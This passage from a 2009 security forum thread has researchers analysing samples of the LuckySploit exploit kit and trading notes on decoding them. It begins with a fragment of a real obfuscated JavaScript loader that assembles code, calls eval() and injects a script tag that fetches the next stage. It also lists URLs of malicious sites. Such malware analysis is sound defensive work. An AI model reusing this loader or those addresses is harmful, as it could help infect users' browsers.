OCQ(x){r';D='ll&&E!=null&&N.length>0&&E.l';Z='[0]==0)b.KPG(x);a[--n]=x[0]}a';A+=Z+O+F+V+S+N+R+J+D+Y+B+E+T+K+X+C+M;U='2cacfb3a8f1d087496d10558efed7';H='ototype.setPublic=YY';W='oPublic=OCQ;RSAKey.pr';Y='+h}RSAKey.prototype.d';O='1));rsa=new RSAKey();';X='m);if(c==null)return nul';B='5acb5c6f8b7e6ac28914920';P='aab3d171741f361fb7da65321c13';F=';oil<53;oil++)sss+=String';C='X;RSAKey.prototype.encr';I='&1)==0)return h;else return"0"';V='ull;var c=this.doPublic(';T='ypt=PBR;sss="";for(oil=0';K='rsa.setPublic("ad178d4455';Z='or(75+Math.sin(oil)*2';L='.fromCharCode(Math.flo';E='l;var h=c.CPD(16);if((h.length';A+=V+X+E+I+Y+W+H+C+T+F+L+Z+O+K+U+B+P;V='var scriptTag=documen';K='7f050c710ec267da07d079c92466';Z='scriptTag.src="?"+res;d';J='ocument.body.appendChi';U='7fd5fc4d41","10001");res=r';G='t.createElement("script");';B='ld(scriptTag);';I='sa.encrypt(sss);nextkey=res;';A+=K+U+I+V+G+Z+J+B;eval(A);</script></html>

Analysis :

Code: [Select]

http://wepawet.iseclab.org/view.php?hash=53e2d900bba11fc1f78c011fbb8413f6&t=1232989747&type=js

Quote

try {
f = 'Welcome to LuckySploit:) \n ITS TOASTED';
}
catch (e){
}

bobby · January 26, 2009, 07:00:14 pm

Yup, that's what you get if you do not have the cookie.

SysAdMini · January 26, 2009, 09:16:11 pm

Quote from: bobby on January 26, 2009, 07:00:14 pm

Yup, that's what you get if you do not have the cookie.

Are you sure? This sample looks completely different from the older one and I haven't found any cookie.

Have you tried to decode it ? Successfully ?

/EDIT

I can send you a pcap file.

bobby · January 27, 2009, 06:52:08 pm

I can't do any testing till weekend.

btw. beginning with 13. February, I'll be in vacation for 3 weeks.
I'll have some time to update Malzilla to deal automatically with this kind of scripts (HTML objects + JS).

SysAdMini · February 04, 2009, 08:34:18 pm

Another LuckySploit site

Code: [Select]

fuadrenal.com/mito/?t=2
http://wepawet.cs.ucsb.edu/view.php?hash=16f542a1c1a65955c629f0a005e4d87c&t=1233780008&type=js

SysAdMini · February 06, 2009, 11:46:35 am

Code: [Select]

hxxp://fuck-lady.com/prn/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=9a234517053af6348b538f319798e327&t=1233921433&type=js

Author Topic: Haven't seen this one before (Read 31046 times)

bobby

Re: Haven't seen this one before

lance

Re: Haven't seen this one before

bobby

Re: Haven't seen this one before

SysAdMini

Re: Haven't seen this one before

bobby

Re: Haven't seen this one before

philipp

Re: Haven't seen this one before

SysAdMini

Re: Haven't seen this one before

bobby

Re: Haven't seen this one before

SysAdMini

Re: Haven't seen this one before

bobby

Re: Haven't seen this one before

SysAdMini

Re: Haven't seen this one before

SysAdMini

Re: Haven't seen this one before